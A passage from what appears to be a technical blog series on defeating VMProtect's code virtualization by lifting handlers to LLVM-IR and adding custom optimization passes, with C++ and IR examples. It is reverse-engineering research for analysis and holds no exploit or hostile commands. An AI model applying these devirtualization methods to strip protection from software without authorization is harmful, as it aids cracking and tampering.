  • The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
  • The updated state of the virtual stack pointer and virtual instruction pointer is computed.

A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:

extern "C" __attribute__((always_inline)) size_t SimpleExample_HelperStub(
  rptr rax, rptr rbx, rptr rcx,
  rptr rdx, rptr rsi, rptr rdi,
  rptr rbp, rptr rsp, rptr r8,
  rptr r9, rptr r10, rptr r11,
  rptr r12, rptr r13, rptr r14,
  rptr r15, rptr flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR, rptr vsp,
  rptr vip, VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots) {

  PUSH_REG(vsp, rax);
  PUSH_REG(vsp, rbx);
  POP_VMREG<64, 0>(vsp, vmregs[1]);
  POP_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[1]);
  ADD<uint64_t>(vsp);
  POP_VMREG<64, 0>(vsp, vmregs[2]);
  POP_VMREG<64, 0>(vsp, vmregs[3]);
  PUSH_VMREG<64, 0>(vsp, vmregs[3]);
  POP_REG(vsp, rax);

  return vip;
}

The C++ HelperStub function with calls to the handlers. This only serves as an example, normally the LLVM-IR for this is automatically generated from VM bytecode.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias %vmregs, i64* noalias %slots) local_unnamed_addr {
entry:
  %rax.addr = alloca i64*, align 8
  %rbx.addr = alloca i64*, align 8
  %rcx.addr = alloca i64*, align 8
  %rdx.addr = alloca i64*, align 8
  %rsi.addr = alloca i64*, align 8
  %rdi.addr = alloca i64*, align 8
  %rbp.addr = alloca i64*, align 8
  %rsp.addr = alloca i64*, align 8
  %r8.addr = alloca i64*, align 8
  %r9.addr = alloca i64*, align 8
  %r10.addr = alloca i64*, align 8
  %r11.addr = alloca i64*, align 8
  %r12.addr = alloca i64*, align 8
  %r13.addr = alloca i64*, align 8
  %r14.addr = alloca i64*, align 8
  %r15.addr = alloca i64*, align 8
  %flags.addr = alloca i64*, align 8
  %KEY_STUB.addr = alloca i64, align 8
  %RET_ADDR.addr = alloca i64, align 8
  %REL_ADDR.addr = alloca i64, align 8
  %vsp.addr = alloca i64*, align 8
  %vip.addr = alloca i64*, align 8
  %vmregs.addr = alloca %struct.VirtualRegister*, align 8
  %slots.addr = alloca i64*, align 8
  %agg.tmp = alloca %struct.VirtualRegister, align 1
  %agg.tmp4 = alloca %struct.VirtualRegister, align 1
  %agg.tmp10 = alloca %struct.VirtualRegister, align 1
  store i64* %rax, i64** %rax.addr, align 8
  store i64* %rbx, i64** %rbx.addr, align 8
  store i64* %rcx, i64** %rcx.addr, align 8
  store i64* %rdx, i64** %rdx.addr, align 8
  store i64* %rsi, i64** %rsi.addr, align 8
  store i64* %rdi, i64** %rdi.addr, align 8
  store i64* %rbp, i64** %rbp.addr, align 8
  store i64* %rsp, i64** %rsp.addr, align 8
  store i64* %r8, i64** %r8.addr, align 8
  store i64* %r9, i64** %r9.addr, align 8
  store i64* %r10, i64** %r10.addr, align 8
  store i64* %r11, i64** %r11.addr, align 8
  store i64* %r12, i64** %r12.addr, align 8
  store i64* %r13, i64** %r13.addr, align 8
  store i64* %r14, i64** %r14.addr, align 8
  store i64* %r15, i64** %r15.addr, align 8
  store i64* %flags, i64** %flags.addr, align 8
  store i64 %KEY_STUB, i64* %KEY_STUB.addr, align 8
  store i64 %RET_ADDR, i64* %RET_ADDR.addr, align 8
  store i64 %REL_ADDR, i64* %REL_ADDR.addr, align 8
  store i64* %vsp, i64** %vsp.addr, align 8
  store i64* %vip, i64** %vip.addr, align 8
  store %struct.VirtualRegister* %vmregs, %struct.VirtualRegister** %vmregs.addr, align 8
  store i64* %slots, i64** %slots.addr, align 8
  %0 = load i64*, i64** %vsp.addr, align 8
  %1 = load i64*, i64** %rax.addr, align 8
  %2 = load i64, i64* %1, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %0, i64 %2)
  %3 = load i64*, i64** %vsp.addr, align 8
  %4 = load i64*, i64** %rbx.addr, align 8
  %5 = load i64, i64* %4, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %3, i64 %5)
  %6 = load i64*, i64** %vsp.addr, align 8
  %7 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %7, i64 1
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %6, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx)
  %8 = load i64*, i64** %vsp.addr, align 8
  %9 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx1 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %9, i64 0
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %8, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx1)
  %10 = load i64*, i64** %vsp.addr, align 8
  %11 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx2 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %11, i64 0
  %12 = bitcast %struct.VirtualRegister* %agg.tmp to i8*
  %13 = bitcast %struct.VirtualRegister* %arrayidx2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %12, i8* align 1 %13, i64 8, i1 false)
  %coerce.dive = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp, i32 0, i32 0
  %coerce.dive3 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive, i32 0, i32 0
  %14 = load i64, i64* %coerce.dive3, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %10, i64 %14)
  %15 = load i64*, i64** %vsp.addr, align 8
  %16 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx5 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %16, i64 1
  %17 = bitcast %struct.VirtualRegister* %agg.tmp4 to i8*
  %18 = bitcast %struct.VirtualRegister* %arrayidx5 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %17, i8* align 1 %18, i64 8, i1 false)
  %coerce.dive6 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp4, i32 0, i32 0
  %coerce.dive7 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive6, i32 0, i32 0
  %19 = load i64, i64* %coerce.dive7, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %15, i64 %19)
  %20 = load i64*, i64** %vsp.addr, align 8
  call void @_Z3ADDIyEvRm(i64* nonnull align 8 dereferenceable(8) %20)
  %21 = load i64*, i64** %vsp.addr, align 8
  %22 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx8 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %22, i64 2
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %21, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx8)
  %23 = load i64*, i64** %vsp.addr, align 8
  %24 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx9 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %24, i64 3
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %23, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx9)
  %25 = load i64*, i64** %vsp.addr, align 8
  %26 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx11 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %26, i64 3
  %27 = bitcast %struct.VirtualRegister* %agg.tmp10 to i8*
  %28 = bitcast %struct.VirtualRegister* %arrayidx11 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %27, i8* align 1 %28, i64 8, i1 false)
  %coerce.dive12 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp10, i32 0, i32 0
  %coerce.dive13 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive12, i32 0, i32 0
  %29 = load i64, i64* %coerce.dive13, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %25, i64 %29)
  %30 = load i64*, i64** %vsp.addr, align 8
  %31 = load i64*, i64** %rax.addr, align 8
  call void @_Z7POP_REGRmS_(i64* nonnull align 8 dereferenceable(8) %30, i64* nonnull align 8 dereferenceable(8) %31)
  %32 = load i64*, i64** %vip.addr, align 8
  %33 = load i64, i64* %32, align 8
  ret i64 %33
}

The LLVM-IR compiled from the previous C++ HelperStub function.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias nocapture %vmregs, i64* noalias nocapture readnone %slots) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %vsp, align 8
  %sub.i.i = add i64 %1, -8
  %arrayidx.i.i = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i
  %value.addr.0.arrayidx.sroa_cast.i.i = bitcast i8* %arrayidx.i.i to i64*
  %2 = load i64, i64* %rbx, align 8
  %sub.i.i66 = add i64 %1, -16
  %arrayidx.i.i67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i66
  %value.addr.0.arrayidx.sroa_cast.i.i68 = bitcast i8* %arrayidx.i.i67 to i64*
  %qword.i62 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 1, i32 0, i32 0
  store i64 %2, i64* %qword.i62, align 1
  %3 = load i64, i64* @__undef, align 8
  %qword.i55 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 0, i32 0, i32 0
  store i64 %0, i64* %qword.i55, align 1
  %add.i32.i = add i64 %2, %0
  %cmp.i.i.i.i = icmp ult i64 %add.i32.i, %2
  %cmp1.i.i.i.i = icmp ult i64 %add.i32.i, %0
  %4 = or i1 %cmp.i.i.i.i, %cmp1.i.i.i.i
  %conv.i.i.i.i = trunc i64 %add.i32.i to i32
  %conv.i.i.i.i.i = and i32 %conv.i.i.i.i, 255
  %5 = tail call i32 @llvm.ctpop.i32(i32 %conv.i.i.i.i.i)
  %xor.i.i28.i.i = xor i64 %2, %0
  %xor1.i.i.i.i = xor i64 %xor.i.i28.i.i, %add.i32.i
  %and.i.i.i.i = and i64 %xor1.i.i.i.i, 16
  %cmp.i.i27.i.i = icmp eq i64 %add.i32.i, 0
  %shr.i.i.i.i = lshr i64 %2, 63
  %shr1.i.i.i.i = lshr i64 %0, 63
  %shr2.i.i.i.i = lshr i64 %add.i32.i, 63
  %xor.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr.i.i.i.i
  %xor3.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr1.i.i.i.i
  %add.i.i.i.i = add nuw nsw i64 %xor.i.i.i.i, %xor3.i.i.i.i
  %cmp.i.i25.i.i = icmp eq i64 %add.i.i.i.i, 2
  %conv.i.i.i = zext i1 %4 to i64
  %6 = shl nuw nsw i32 %5, 2
  %7 = and i32 %6, 4
  %8 = xor i32 %7, 4
  %9 = zext i32 %8 to i64
  %shl22.i.i.i = select i1 %cmp.i.i27.i.i, i64 64, i64 0
  %10 = lshr i64 %add.i32.i, 56
  %11 = and i64 %10, 128
  %shl34.i.i.i = select i1 %cmp.i.i25.i.i, i64 2048, i64 0
  %or6.i.i.i = or i64 %11, %shl22.i.i.i
  %and13.i.i.i = or i64 %or6.i.i.i, %and.i.i.i.i
  %or17.i.i.i = or i64 %and13.i.i.i, %conv.i.i.i
  %and25.i.i.i = or i64 %or17.i.i.i, %shl34.i.i.i
  %or29.i.i.i = or i64 %and25.i.i.i, %9
  %qword.i36 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 2, i32 0, i32 0
  store i64 %or29.i.i.i, i64* %qword.i36, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i68, align 1
  %qword.i = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 3, i32 0, i32 0
  store i64 %add.i32.i, i64* %qword.i, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i, align 1
  store i64 %add.i32.i, i64* %rax, align 8
  %12 = load i64, i64* %vip, align 8
  ret i64 %12
}

The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers

The last snippet is representing all the semantic computations related with a VmBlock, as described in the high level overview. Although, if the code we lifted is capturing the whole semantics related with a VmStub, we can wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations updating the host execution context:

extern "C" size_t SimpleExample_HelperFunction(
    rptr rax, rptr rbx, rptr rcx,
    rptr rdx, rptr rsi, rptr rdi,
    rptr rbp, rptr rsp, rptr r8,
    rptr r9, rptr r10, rptr r11,
    rptr r12, rptr r13, rptr r14,
    rptr r15, rptr flags, size_t KEY_STUB,
    size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = SimpleExample_HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.

define dso_local i64 @SimpleExample_HelperFunction(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %rbx, align 8
  %add.i32.i.i = add i64 %1, %0
  store i64 %add.i32.i.i, i64* %rax, align 8
  ret i64 0
}

The LLVM-IR HelperFunction function with fully optimized code.

It can be seen that the example is just pushing the values of the registers rax and rbx, loading them in vmregs[0] and vmregs[1] respectively, pushing the VmRegisters on the stack, adding them together, popping the updated flags in vmregs[2], popping the addition’s result to vmregs[3] and finally pushing vmregs[3] on the stack to be popped in the rax register at the end. The liveness of the values of the VmRegisters ends with the end of the function, hence the updated flags saved in vmregs[2] won’t be reflected on the host execution context. Looking at the final snippet we can see that the semantics of the code have been successfully obtained.

What’s next?

In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.

Tickling VMProtect with LLVM: Part 3

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.

Custom passes

This section will give an overview of some custom passes meant to:

  • Solve VMProtect specific optimization problems;
  • Solve some limitations of existing LLVM passes, but that won’t meet the same quality standard of an official LLVM pass.

SegmentsAA

This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.

With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:

  • general purpose registers
  • VmRegisters
  • VmPassingSlots
  • GS zero-sized array
  • FS zero-sized array
  • RAM zero-sized array (with constant index)
  • RAM zero-sized array (with symbolic index)

Additionally LLVM can also discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).

But LLVM’s alias analysis passes fall short when handling pointers using as base the RAM array and employing a more convoluted symbolic index, and the reason for the shortcoming is entirely related to the lack of type and context information that got lost during the compilation to binary.

The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.

Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:

  • indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
  • local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
  • local stack array: if the access if of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.

If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.

One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.

Irregardless of the aforementioned issue, that can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.

The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.

start:
  push rax
  mov qword ptr [rsp], 1
  mov qword ptr [rcx], 2
  pop rax

The assembly code writing to two possibly aliasing memory slots

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rcx, align 8, !alias.scope !22, !noalias !27
  %2 = inttoptr i64 %1 to i64*
  store i64 2, i64* %2, align 1, !noalias !65
  store i64 1, i64* %rax, align 8, !tbaa !4, !alias.scope !66, !noalias !67
  ret i64 5368713278
}

The devirtualized code with the SegmentsAA pass added to the pipeline, with the assumption that rcx differs from rsp - 8

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rsp, align 8, !tbaa !4, !alias.scope !22, !noalias !27
  %2 = add i64 %1, -8
  %3 = load i64, i64* %rcx, align 8, !alias.scope !65, !noalias !66
  %4 = inttoptr i64 %2 to i64*
  store i64 1, i64* %4, align 1, !noalias !67
  %5 = inttoptr i64 %3 to i64*
  store i64 2, i64* %5, align 1, !noalias !67
  %6 = load i64, i64* %4, align 1, !noalias !67
  store i64 %6, i64* %rax, align 8, !tbaa !4, !alias.scope !68, !noalias !69
  ret i64 5368713278
}

The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM

Alias analysis is a complex topic, and experience thought me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to the LLVM’s alias analysis passes being hinder by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely doing similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).

The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.

KnownIndexSelect

This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.

uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = { 0 };
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];
}

What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.

LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.

At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.

; Matched pattern
%i0 = add i64 %base, %index
%i1 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %i0
%i2 = bitcast i8* %i1 to i64*
%i3 = load i64, i64* %i2, align 1

; Exploded form
%51 = add i64 %base, 0
%52 = add i64 %base, 8
%53 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
%54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
%55 = bitcast i8* %53 to i64*
%56 = bitcast i8* %54 to i64*
%57 = load i64, i64* %55, align 8
%58 = load i64, i64* %56, align 8
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 %57, i64 %58

; Simplified select instruction
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 5369966919, i64 5369966790

The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.

A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.

SynthesizeFlags

This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.

This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.

There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.

This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.

start:
  cmp rax, rbx
  jcc label
  and rcx, rdx
  mov qword ptr ds:[rcx], 1
  jmp exit
label:
  xor rcx, rdx
  add qword ptr ds:[rcx], 2
exit:

MemoryCoalescing

This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. Although the more convoluted case of multiple stores contributing to the value of a single memory slot are somehow only partially handled.

This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.

